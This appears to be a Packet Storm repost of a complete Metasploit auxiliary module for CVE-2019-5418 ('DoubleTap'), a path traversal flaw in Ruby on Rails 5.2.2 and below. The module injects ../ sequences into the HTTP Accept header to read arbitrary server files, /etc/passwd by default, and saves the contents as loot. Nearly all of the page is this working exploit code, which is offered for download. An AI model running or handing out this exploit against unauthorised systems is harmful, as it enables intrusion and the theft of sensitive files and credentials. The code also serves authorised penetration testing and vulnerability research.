exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ruby On Rails File Content Disclosure

Ruby On Rails File Content Disclosure
Posted Aug 31, 2024
Authored by Carter Brainerd, John Hawthorn | Site metasploit.com

This Metasploit module uses a path traversal vulnerability in Ruby on Rails versions 5.2.2 and below to read files on a target server.

tags | exploit, ruby
advisories | CVE-2019-5418
SHA-256 | e6610f0dd279a2856b604ea85dd6f34b7e5f6cbda7b97cb0fadf6379f760daa6

Ruby On Rails File Content Disclosure

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => "Ruby On Rails File Content Disclosure ('doubletap')",
'Description' => %q{
This module uses a path traversal vulnerability in Ruby on Rails
versions =< 5.2.2 to read files on a target server.
},
'Author' =>
[
'Carter Brainerd <0xCB@protonmail.com>', # Metasploit module
'John Hawthorn <john@hawthorn.email>' # PoC/discovery
],
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://hackerone.com/reports/473888' ],
[ 'URL', 'https://github.com/mpgn/Rails-doubletap-RCE' ],
[ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q' ],
[ 'URL', 'https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/' ],
[ 'CVE', '2019-5418'],
[ 'EDB', '46585' ]
],
'Notes' => {
'AKA' => ['DoubleTap']
}
)
)

register_options(
[
Opt::RPORT(80),
OptString.new('ROUTE', [true, 'A route on the vulnerable server.', '/home']),
OptInt.new('DEPTH', [true, 'The depth of the traversal.', 10]),
OptString.new('TARGET_FILE', [true, 'The absolute path of remote file to read.', '/etc/passwd']),
OptBool.new('PRINT_RESULTS', [true, 'Print results of module (may hang with large amounts of data).', true])
]
)

register_advanced_options(
[
OptBool.new('SkipCheck', [true, 'Skip the initial vulnerability check.', false])
]
)
end

def get_accept_header_value(depth, file)
return (('../'*depth) + file + '{{').gsub('//', '/')
end

def check
return true if datastore['SkipCheck']
# Check if target file is absolute path
unless datastore['TARGET_FILE'].start_with? '/'
vprint_error "TARGET_FILE must be an absolute path (eg. /etc/passwd)."
return Exploit::CheckCode::Unknown
end

# Fire off the request
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['ROUTE']),
'headers' => { 'Accept' => get_accept_header_value(datastore['DEPTH'], '/etc/passwd')}
})

if res.nil?
vprint_error "Request timed out."
return Exploit::CheckCode::Unknown
end

if res.body.include? 'root:x:0:0:root:'
return Exploit::CheckCode::Vulnerable
else
vprint_error 'Target is not vulnerable. Make sure your route is correct.'
return Exploit::CheckCode::Unknown
end
end

def run
unless check == Exploit::CheckCode::Vulnerable
print_error 'Check did not pass, exiting.'
return
end

fail_with(Failure::BadConfig, 'TARGET_FILE must be an absolute path (eg. /etc/passwd).') unless datastore['TARGET_FILE'].start_with? '/'


print_status "Requesting file #{datastore['TARGET_FILE']}"

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['ROUTE']),
'headers' => { 'Accept' => get_accept_header_value(datastore['DEPTH'], datastore['TARGET_FILE'])}
})

if res.nil?
print_error "Request timed out."
return
end

unless res.code == 200
print_error "Failed to read file: #{datastore['TARGET_FILE']}. HTTP error: #{res.code}."
print_error 'User probably doesnt have access to the requested file.' if res.code == 500
return
end

unless datastore['PRINT_RESULTS']
print_good 'Response from server:'
print_line res.body.to_s
end
store_loot('rails.doubletap.file', 'text/plain', datastore['RHOSTS'], res.body.to_s, datastore['TARGET_FILE'], "File read via Rails DoubleTap auxiliary module.")
print_status 'Results stored as loot.'
end
end
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close